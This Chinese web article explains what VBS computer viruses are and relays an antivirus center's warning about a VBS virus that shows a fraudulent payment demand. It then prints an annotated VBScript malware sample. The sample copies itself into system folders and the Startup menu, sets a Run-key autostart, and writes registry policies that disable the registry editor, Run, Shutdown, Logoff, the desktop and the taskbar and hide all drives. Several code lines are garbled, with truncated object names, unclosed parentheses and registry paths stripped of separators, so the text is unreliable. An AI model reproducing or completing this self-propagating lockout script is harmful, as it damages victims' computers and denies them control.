vbs的电脑病毒代码是怎样的

2016-11-25

计算机病毒,是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据,影响计算机使用,并能自我复制的一组计算机指令或者程序代码。这是目前官方最权威的关于计算机病毒的定义,此定义也被通行的《计算机病毒防治产品评级准则》的国家标准所采纳。以下是网小编为大家整理的关###于vbs电脑病毒代码的相关知识,希望对大家有所帮助!

上海计算机病毒防范服务中心提醒,本周需防范一种在网上流行的“VBS病毒”(Virus.VBS.d),该病毒不但导致多种杀毒软件不能运行,而且还会弹出“解毒号码”等欺诈信息,要求被害用户向指定账户汇款,反病毒专家提醒用户不要被这种欺诈信息迷惑。

据介绍,这种病毒可以导致多种杀毒软件或工具不能正常运行。更值得注意的是,当病毒感染的文件数超过2000个,会弹出对话框提示信息,提示内容为:“您已有超过2000个文件被感染!不过请放心,此病毒很容易被清除!请联系418465***!”反病毒专家分析,这个号码是QQ号,受害用户一旦加入这个号码,会被要求向指定账户汇款。专家提醒这通常是欺诈行为,受害用户要以正常方式杀毒,不要轻信这种欺诈信息。

专家建议,平时用户上网时要开启防病毒软件的实时监控功能,并关闭U盘的“自动播放功能”。用户可针对自己计算机安装的操作系统,找到相应的安全漏洞补丁,下载并安装。以遏制利用这些漏洞进行传播的病毒,减少病毒给计算机用户带来的危害。

on error resume next

set fs=createobject("ing.filesystemobject" '创建一个能与操作系统沟通的对象,再利用该对象的各种方法对注册表进行操作

set dir1=fs.getspecialfolder(0) '获取windows/winnt文件夹位置

set dir2=fs.getspecialfolder(1) '获取system32/system文件夹位置

set so=createobject("ing.filesystemobject"

dim r '定义一个变量

set r=createobject("w.shell"

so.getfile(w.fullname).copy(dir1&"win32system.vbs" '复制病毒副本到windows/winnt文件夹位置

so.getfile(w.fullname).copy(dir2&"win32system.vbs" '复制病毒副本到system32/system文件夹位置

so.getfile(w.fullname).copy(dir1&"start menuprograms启动win32system.vbs" '复制病毒副本到start menu启动菜单

'下面是对注册表的恶意修改和简单的依靠oe传播

r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorernorun",1,"reg_dword" '修改注册表,禁止“运行”菜单

r.regwrite "kcusoftwaremicrosoftwindowscurrentversionpoliciesexplorernoclose",1,"reg_dword" '修改注册表,禁止“关闭”菜单

r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorernodrives",63000000,"reg_dword" '修改注册表,隐藏所有逻辑盘符

r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciessystemdisableregistrytools",1,"reg_dword" '修改注册表,禁止注册表编辑

r.regwrite "hklmsoftwaremicrosoftwindowscurrentversionrunscanregistry","" '修改注册表,禁止开机注册表扫描

r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorernologoff",1,"reg_dword" '修改注册表,禁止“注销”菜单

r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpolicieswinoldappnorealmode",1,"reg_dword" '修改注册表,禁止ms-dos实模式

r.regwrite "hklmsoftwaremicrosoftwindowscurrentversionrunwin32system","win32system.vbs" '修改注册表,使这个脚本本身开机自动运行

r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorernodesktop",1,"reg_dword" '修改注册表,禁止显示桌面图标

r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpolicieswinoldappdisabled",1,"reg_dword" '修改注册表,禁止纯dos模式

r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorernosettaskbar",1,"reg_dword" '修改注册表,禁止“任务栏和开始”菜单

r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorernoviewcontextmenu",1,"reg_dword" '修改注册表,禁止右键菜单

更多相关阅读

最新发布的文章